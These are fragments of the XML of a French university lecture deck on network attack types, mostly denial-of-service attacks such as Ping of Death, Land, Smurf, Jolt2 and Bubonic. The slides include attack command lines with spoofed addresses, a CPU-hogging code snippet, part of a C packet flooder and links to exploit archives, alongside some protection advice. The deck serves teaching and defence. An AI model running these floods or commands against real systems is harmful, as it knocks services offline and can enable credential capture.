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23B07-98BF-437F-B44B-DE7767C456F9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B6E18-15FF-4484-8D35-C1CD55DD5A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73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5BA122-D5B0-4107-B782-6C7A343AF6BF}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" smtClean="0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5CF6F3-1A2B-4BD1-B425-2BF5382923E6}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22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84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22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50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06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4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91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51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97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72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8021-379F-40A2-BA0B-2A92C4F7B60E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>10/03/2019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999E-AA57-4D1F-8148-2E22465C0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newdata.box.sk/neworder/xforces/sspingeggdrop.zi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worder.box.sk" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.insecure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ackersclub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inertnals.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://neworder.box.s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ticode.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackersclub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2881313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0068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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2053" name="Picture 5" descr="pic-English-34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/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1087438" y="4737100"/>
            <a:ext cx="525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r="2380"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="320675" y="4197350"/>
            <a:ext cx="836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"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1030288" y="5341938"/>
            <a:ext cx="739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p31_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5341938"/>
            <a:ext cx="67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SNCF427056_1it0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4737100"/>
            <a:ext cx="692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asse_07_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4737100"/>
            <a:ext cx="7381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S7-400FH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197350"/>
            <a:ext cx="7064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WordArt 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="309563" y="5273675"/>
            <a:ext cx="2017712" cy="428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b="1" kern="10">
                <a:solidFill>
                  <a:srgbClr val="006866"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Arial Unicode MS"/>
                <a:cs typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>PROCESS - ENERGIE - MANUFACTURIER - MACHINE - TRANSPORT - INFRASTRUCTURES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2360613" y="4654550"/>
            <a:ext cx="60134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fr-FR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bureau: B160 - tél: +33 (0)3.87.37.54.49 - Email: olaf.malasse@ensam.eu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2051050" y="4306888"/>
            <a:ext cx="4304448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fr-FR" sz="1700" dirty="0"/>
              <a:t>Intervenant : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Hicham BELHADAOUI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" smtClean="0"/>
              <a:t>                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" smtClean="0"/>
              <a:t>                    Chapitre 3 : Types d’attaques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2064" name="WordArt 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="2924175"/>
            <a:ext cx="6567487" cy="1539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i="1" kern="10">
                <a:solidFill>
                  <a:srgbClr val="006866"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
              </a:rPr>
              <a:t>Enseignements Théoriques : 20h  -  Conférences : 6h  -  Enseignements Dirigés : 12h  -  Enseignements Pratiques : 10h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2066" name="WordArt 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="369888" y="2063750"/>
            <a:ext cx="3381375" cy="13811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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
              </a:rPr>
              <a:t>GÉNIE INFORMATIQUE - </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2068" name="WordArt 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="692150"/>
            <a:ext cx="3340100" cy="1235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b="1" kern="10" dirty="0" smtClean="0">
                <a:gradFill rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="828282"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="828282"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ESTC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" b="1" kern="10" dirty="0">
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="828282"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="FFFFFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="828282"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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8285163" y="6627813"/>
            <a:ext cx="8588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fr-FR" sz="900">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> M0910-FD12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25510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Ping de la mort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Sous Dos :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ping –l 65527 @IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sous Unix :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ping –s 65527 @IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Comment se protéger :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Appliquer le dernier patch par constructeur;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Appliquer des règles de filtrage : routeurs, parefeu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A8CE61-96A7-4AF2-BE0E-AF7970640247}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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4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ssping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smtClean="0"/>
              <a:t>OS : Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Utilise le principe de fragmentation pour geler tout ordinateur connecté à Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Routeur : fragmente un gros paquet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Exemple :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://newdata.box.sk/neworder/xforces/sspingeggdrop.zip</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-CA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2ADE23-F8C0-47B9-A0B8-9C7D456F4A82}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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Land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sz="2800" smtClean="0"/>
              <a:t>Paquet ayant une même adresse source et destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" smtClean="0"/>
              <a:t>Code source :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.insecure.org</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" smtClean="0"/>
              <a:t>Agressor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>: http://neworder.box.sk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" smtClean="0"/>
              <a:t>Spike : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://hackersclub.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" smtClean="0"/>
              <a:t>Comment se protéger :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" smtClean="0"/>
              <a:t>Site ftp de microsoft : land-fix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BD6607-A96C-4AF2-82C1-83E942B46496}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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smtClean="0"/>
              <a:t>SMURF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 smtClean="0"/>
              <a:t>Inondation d’un réseau avec du trafic broadcast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Ping ICMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Usurpation des @IP source des echo request;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Envoi des paquets à une @IP diffusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Sources : Agressor, Spike</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Variantes : echo UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Papa smurf;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Fraggle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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8CDF1C-A8EA-4672-A20B-FFB128810529}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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1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HOG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CA" smtClean="0"/>
              <a:t>Provoque le crash des machines NT par épuisement de toutes les ressources;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Accès physique à la machine n’est nécessaire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Exécuté par un contrôle Active X ou d’un plug-in Netscape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Un pirate peut créer exprès un site Web malveillant provoquant le crash des machines des victimes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:endParaRPr lang="fr-CA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0268DC-60EF-447E-9782-6F39C3985548}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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HOG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mtClean="0"/>
              <a:t>32 niveaux de priorité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Applications de niveau administration;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>16 niveaux :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Applications de niveau utilisateur;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Pb : NT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>Les applications fixent elles même leur niveau de priorité;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CA" smtClean="0"/>
              <a:t>A une influence sur le nombre de fois ou NT leur permet de s’exécuter.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EF351A-AF20-429D-BB60-3B01C8B1AEDC}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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2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HOG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077200" cy="4411662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Source :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>While(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://neworder.box.sk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.ntinertnals.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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DEC11DD-494E-4EBF-BC5A-84F2F7BA2E76}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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0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Jolt2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Permet à un attaquant distant de causer un Déni de service contre des machines Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Envoi d’un grand nombre de paquets IP fragmentés identiques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Systèmes vulnérables :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95/98/NT/2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cisco 26xx, 25xx, 4500, 36xx; routeur Bay(Nortel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Firewalls : Firewall-1(checkpoint),sur Solaris, Nokia, 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DB8206-9337-4EFB-ADE3-87A4DE27F69B}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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5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Jolt2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16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Faille de réassemblage des fragments IP sous Windows :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Qd un paquet mal formé arrive à un hôte, la charge de travail augmente considérablement;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fonction du débit :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>150 paquets/s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="-109" charset="2"/>
              </a:rPr>
              <a:t> CPU : 100%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="-109" charset="2"/>
              </a:rPr>
              <a:t>Source : Jolt2.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="-109" charset="2"/>
              </a:rPr>
              <a:t>Données : 29 octets(20 IP, 9 Data) MF=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="-109" charset="2"/>
              </a:rPr>
              <a:t>Lg totale IPH : 68 octets (20 IP, 48 Data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="-109" charset="2"/>
              </a:rPr>
              <a:t>Or dans offset dans IPH : 65520</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US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4D6731-96D6-4E1F-9562-0FB26017FCFA}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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59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Jolt2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Exemple :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>./jolt2 192.168.5.1 –p 80 192.168.7.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Envoi des paquets à l’@ source usurpée (192.168.5.1) en direction de l’@IP 192.168.7.10 sur le port 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Utilisation :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mettre hors service une machine tandis qu’il s’adresse à l’autre en usurpant l’identité de la première.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> 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C05A21-2214-488E-8D64-59D58384FE18}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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7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D48D4A-1C85-4B2F-98E4-D628E974C6E3}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Types d’attaques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662487"/>
          </a:xfrm>
        </p:spPr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fr-FR" dirty="0" smtClean="0"/>
              <a:t>Accès non autorisé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="190000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Usurpation d’identité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="190000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Déni de service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11010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Jolt2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Utilisation :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Provoquer le verrouillage d’une machine et amener son utilisateur à la redémarrer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Capturer le nom d’utilisateur et le mot de passe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669DBD-29AA-4C6F-B604-98345AE87C90}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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7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Bubonic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OS : windows 98, windows 2000 certaines versions de linux;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Envoyer des paquets TCP contenant des paramètres aléatoires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Objectif :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Augmenter la charge de travail de la machine;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Provoquer un crash de celle ci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126379-91B8-465D-AEA0-4AC7740BED17}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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5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902325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>void flooder(void)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{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struct timespec ts;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int I;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memset(&amp;packet, 0, sizeof(packet));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ts.tv_sec                   = 0;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ts.tv_nsec                  = 100; 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packet.ip.ip_hl             = 5;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packet.ip.ip_v              = 4;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packet.ip.ip_p              = IPPROTO_TCP;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packet.ip.ip_tos            = 0xc9;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packet.ip.ip_id             = radd;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packet.ip.ip_len            = FIX(sizeof(packet));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packet.ip.ip_off            = random();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packet.ip.ip_ttl            = 255;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packet.ip.ip_dst.s_addr     = radd;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 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packet.tcp.th_flags         = 0;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packet.tcp.th_win           = 0;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packet.tcp.th_seq           = random();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packet.tcp.th_ack           = 0;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packet.tcp.th_off           = 0; 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packet.tcp.th_urp           = 0;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packet.tcp.th_dport         = random();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cksum.pseudo.daddr          = sradd;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cksum.pseudo.mbz            = 0;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cksum.pseudo.ptcl           = IPPROTO_TCP;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>    cksum.pseudo.tcpl           = random(); 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8008FA-AB15-4084-9A65-09E9B744BAD4}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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2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Outils DOS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TARGA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8 attaques DOS différentes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bonk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Jolt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Netsea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Newtear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sundrop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
